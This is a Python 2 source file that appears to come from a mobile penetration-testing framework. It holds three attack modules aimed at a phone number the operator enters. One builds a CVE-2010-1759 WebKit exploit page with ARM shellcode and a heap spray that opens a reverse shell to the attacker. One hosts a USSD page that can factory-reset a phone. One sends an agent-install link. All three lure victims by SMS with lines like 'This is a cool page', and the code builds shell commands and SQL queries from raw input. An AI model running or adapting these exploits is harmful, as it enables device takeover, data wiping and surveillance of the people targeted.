def client_side():
# TODO: fix a lot
webserver = config.get("Web", "server")
# ipaddress = config.get('Web', 'ipaddress')
shellipaddress = config.get("Web", "shellipaddress")
cs = ["CVE 2010-1759 Webkit Vuln Android"]
choice = menu(cs)
if choice in (0, "Error"):
return 0
elif choice == 1:
path = str(raw_input(color(33, "[-] Hosting Path: ")))
filename = str(raw_input(color(33, "[-] Filename: ")))
ipaddress = str(raw_input(color(33, "[-] Local IP address: ")))
number = str(raw_input(color(33, "[-] Phone Number to Attack: ")))
link = "http://%s%s%s" % (ipaddress, path, filename)
fullpath = webserver + path
command1 = "mkdir %s" % fullpath
system(command1)
octets = shellipaddress.split(".")
out1 = struct.pack("b", int(octets[0]))
hex1 = hex(out1)
out2 = struct.pack("b", int(octets[1]))
hex2 = hex(out2)
out3 = struct.pack("b", int(octets[2]))
hex3 = hex(out3)
out4 = struct.pack("b", int(octets[3]))
hex4 = hex(out4)
sploitfile = "%s%s" % (fullpath, filename)
command8 = "touch %s" % sploitfile
system(command8)
command9 = "chmod 777 %s" % sploitfile
system(command9)
file = open(sploitfile, "w")
text = [
"<html>\n",
"<head>\n",
"<script>\n",
'var ip = unescape("\\u' + hex2 + hex1 + "\\u" + hex4 + hex3 + '");\n',
'var port = unescape("\\u3930");\n',
"function trigger()\n",
"{\n",
'var span = document.createElement("div");\n',
'document.getElementById("BodyID").appendChild(span);\n',
'span.innerHTML = -parseFloat("NAN(ffffe00572c60)");\n',
"}\n",
"function exploit()\n",
"{\n",
'var nop = unescape("\\u33bc\\u0057");\n',
"do\n",
"{\n",
"nop+=nop;\n",
"} while (nop.length<=0x1000);\n",
'var scode = nop+unescape("\\u1001\\ue1a0\\u0002\\ue3a0\\u1001\\ue3a0\\u2005\\ue281\\u708c\\ue3a0\\u708d\\ue287\\u0080\\uef00\\u6000\\ue1a0\\u1084\\ue28f\\u2010\\ue3a0\\u708d\\ue3a0\\u708e\\ue287\\u0080\\uef00\\u0006\\ue1a0\\u1000\\ue3a0\\u703f\\ue3a0\\u0080\\uef00\\u0006\\ue1a0\\u1001\\ue3a0\\u703f\\ue3a0\\u0080\\uef00\\u0006\\ue1a0\\u1002\\ue3a0\\u703f\\ue3a0\\u0080\\uef00\\u2001\\ue28f\\uff12\\ue12f\\u4040\\u2717\\udf80\\ua005\\ua508\\u4076\\u602e\\u1b6d\\ub420\\ub401\\u4669\\u4052\\u270b\\udf80\\u2f2f\\u732f\\u7379\\u6574\\u2f6d\\u6962\\u2f6e\\u6873\\u2000\\u2000\\u2000\\u2000\\u2000\\u2000\\u2000\\u2000\\u2000\\u2000\\u0002");\n',
"scode += port;\n",
"scode += ip;\n",
'scode += unescape("\\u2000\\u2000");\n',
"target = new Array();\n",
"for(i = 0; i < 0x1000; i++)\n",
"target[i] = scode;\n",
"for (i = 0; i <= 0x1000; i++)\n",
"{\n",
'document.write(target[i]+"<i>");\n',
"if (i>0x999)\n",
"{\n",
"trigger();\n",
"}\n",
"}\n",
"}\n",
"</script>\n",
"</head>\n",
'<body id="BodyID">\n',
"Enjoy!\n",
"<script>\n",
"exploit();\n",
"</script>\n",
"</body>\n",
"</html>\n",
]
file.writelines(text)
file.close()
modem = get_modem()
if modem == 0:
print color(31, "\n[!] No modems found. Attach a modem to use this functionality\n")
return 1
# Read SQL vars from config
sqlserver = config.get("SQL", "server")
username = config.get("SQL", "username")
password = config.get("SQL", "password")
db = MySQLdb.connect(sqlserver, username, password, "framework")
pathquery = "SELECT %s from modems where id=%s" % ("path", modem)
path2 = db_exec_rows(pathquery)
keyquery = "SELECT %s from modems where id=%s" % ("controlkey", modem)
key2 = db_exec_rows(keyquery)
modemtypequery = "SELECT %s from modems where id=%s" % ("type", modem)
modemtype2 = db_exec_rows(modemtypequery)
if modemtype2 == "usb":
# Interface with USB modem
usb = serial.serialposix(port="/dev/ttyUSB2", baudrate=115200, bytesize=8, parity="N", stopbits=1)
usb.write("ATZ\r\n")
sleep(1)
line = read_modem(usb)
print line
sleep(1)
usb.write("AT+CMGF=1\r\n")
line = read_modem(usb)
print line
sleep(1)
numberline = 'AT+CMGS="%s"\r\n' % number
usb.write(numberline)
line = read_modem(usb)
print line
sleep(1)
msg = "This is a cool page: %s" % link
usb.write(struct.pack("b", 26, msg))
sleep(2)
line = read_modem(usb)
print line
sleep(1)
usb.close()
elif modemtype2 == "app":
# Interface with app-based modem
control = "%s%s/getfunc" % (webserver, path2)
command2 = "%s SEND %s This is a cool page: %s" % (key2, number, link)
file = open(control, "w")
file.write(command2)
file.close()
vulnerable = "no"
# socket = new IO::Socket::INET (LocalHost => $shellipaddress, LocalPort => '12345', Proto => 'tcp' , Listen => 1, Reuse => 1, Timeout=> 180);
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind((str(shellipaddress), 12345))
if data_socket == socket.accept():
data = "/system/bin/id\n"
data_socket.write(data)
data = data_socket()
print data
close(data_socket)
vulnerable = "yes"
print color(32, "\n[+] Vulnerable: %s\n" % vulnerable)
table = "client"
global db
number2 = '"%s"' % number
vulnerable2 = '"%s"' % vulnerable
webkit = '"webkit"'
insertquery = "INSERT INTO %s (id,number,exploit,vuln) VALUES (DEFAULT,%s,%s,%s)" % (
table,
number2,
webkit,
vulnerable2,
)
cursor = db.cursor()
sql = cursor.execute(insertquery)
return 0
return 1
def ussd(ussd=None):
webroot = config.get('Web', 'webroot')
ipaddress = config.get('Web', 'ipaddress')
if ussd == None:
ussd = "*2767*3855%23"
print ''
print color(31, "[!] WARNING: THIS CAN FACTORY RESET YOUR PHONE IF VULNERABLE.")
print color(31, "[ ] FOR PROOF OF CONCEPT USE ONLY!")
print color(31, "[ ] USE THE SAFE VERSION ON PENTESTS")
print ''
path = str(raw_input(color(33, "[-] Hosting Path (%s+input): " % webroot)))
filename = str(raw_input(color(33, "[-] Filename: " )))
number = str(raw_input(color(33, "[-] Phone Number to Attack: ")))
if path[0] != '/':
path = '/'+path
if filename[0] != '/':
filename = '/'+filename
link = "http://"+ipaddress+path+filename
fullpath = webroot+path
command1 = "mkdir "+fullpath
system(command1)
sploitfile = fullpath+filename
command8 = "touch "+sploitfile
system(command8)
command9 = "chmod 777 "+sploitfile
system(command9)
# File modification here
sploit2 = "/redirect.html"
sploitfile2 = fullpath+sploit2
text = ['<html>\n',
'\t<head>\n',
'\t\t<meta http-equiv="refresh" content="1;url=http://'+ipaddress+path+sploit2+'">\n',
'\t</head>\n',
'\t<frameset>\n',
'\t\t<frame src="tel:'+ussd+'" />\n',
'\t</frameset>\n',
'</html>\n'
]
file = open(sploitfile, 'w')
file.writelines(text)
file.close()
command8 = "touch "+sploitfile2
system(command8)
command9 = "chmod 777 "+sploitfile2
system(command9)
text2 = ['<html>\n',
'\t<frameset>\n',
'\t\t<frame src="tel:'+ussd+'" />\n',
'\t</frameset>\n',
'</html>\n'
]
file = open(sploitfile2, 'w')
file.writelines(text2)
file.close()
modem = get_modem()
if modem == 0:
print color(31, '\n[!] No modems found. Attach a modem to use this functionality\n')
return 0
cursor = db.cursor()
pathquery = 'SELECT %s from modems where id=%s' % ('path', modem)
cursor.execute(pathquery)
results = cursor.fetchall()
path2 = results[0]
keyquery = 'SELECT %s from modems where id=%s' % ('controlkey', modem)
cursor.execute(keyquery)
results = cursor.fetchall()
key2 = results[0]
modemtypequery = 'SELECT %s from modems where id=%s' % ('type', modem)
cursor.execute(modemtypequery)
results = cursor.fetchall()
modemtype2 = results[0]
if modemtype2 == 'usb':
try:
usb = serial.serialposix(port='/dev/ttyUSB2', baudrate=115200, bytesize=8, parity='N', stopbits=1)
usb.write('ATZ\r\n')
sleep(1)
line = read_modem(usb)
print line
sleep(1)
usb.write('AT+CMGF=1\r\n')
line = read_modem(usb)
print line
sleep(1)
numberline = 'AT+CMGS="%s"\r\n' % number
usb.write(numberline)
line = read_modem(usb)
print line
sleep(1)
msg = 'This is a cool page: %s' % link
usb.write(struct.pack('b',26, msg))
sleep(2)
line = read_modem(usb)
print line
sleep(1)
usb.close()
print color(32, '[+] Data sent!')
return 0
except Exception, e:
print color(31, '[!] Error: %s' % e)
x = ussd()
return x
def direct_download():
#TODO: cleanup
webserver = config.get('Web', 'server')
ipaddress = config.get('Web', 'ipaddress')
print color(35, '[*] This module sends an SMS with a link to directly download and install an Agent\n')
print color(31, '[!] ONLY Android currently Supported')
#platform = str(raw_input('Platform(Android/iPhone/Blackberry): '))
platform = 'android'
# Lots of potential for error with the way this is handled, would
# prefer safer execution
path = str(raw_input(color(33, '[-] Hosting Path: ' )))
filename = str(raw_input(color(33, '[-] Filename: ' )))
number = str(raw_input(color(33, '[-] Phone Number to Attack: ')))
if platform.lower() == 'android':
link = 'http://%s%s%s' % (ipaddress, path, filename)
fullpath = '%s%s' % (webserver, path)
command1 = 'mkdir %s' % fullpath
system(command1)
global location # Android agent location
command = 'cp %s %s%s%s'% (location, webserver, path, filename)
system(command)
modem = get_modem()
if modem == 0:
print color(31, '\n[!] No modems found. Attach a modem to use this functionality\n')
return 0
else:
pathquery = "SELECT %s from modems where id=%s" % ('path', modem)
path2 = db_exec_rows(pathquery)
keyquery = "SELECT %s from modems where id=%s" % ('controlkey', modem)
key2 = db_exec_rows(keyquery)
modemtypequery = "SELECT %s from modems where id=%s" % ('type', modem)
modemtype2 = db_exec_rows(modemtypequery)
if modemtype2 == 'usb':
usb = serial.serialposix(port='/dev/ttyUSB2', baudrate=115200, bytesize=8, parity='N', stopbits=1)
usb.write('ATZ\r\n')
sleep(1)
line = read_modem(usb)
print line
sleep(1)
usb.write('AT+CMGF=1\r\n')
line = read_modem(usb)
print line
sleep(1)
numberline = 'AT+CMGS="%s"\r\n' % number
usb.write(numberline)
line = read_modem(usb)
print line
sleep(1)
msg = 'This is a cool app: %s' % link
usb.write(struct.pack('b', 26, msg))
sleep(5)
line = read_modem(usb)
print line
sleep(1)
usb.close()
elif modemtype2 == 'app':
control = '%s%s/getfunc' % (webserver, path2)
command2 = '%s SEND %s This is a cool app: %s' % (key2, number, link)
file = open(control, 'w')
file.write(command2)
file.close()
return 0
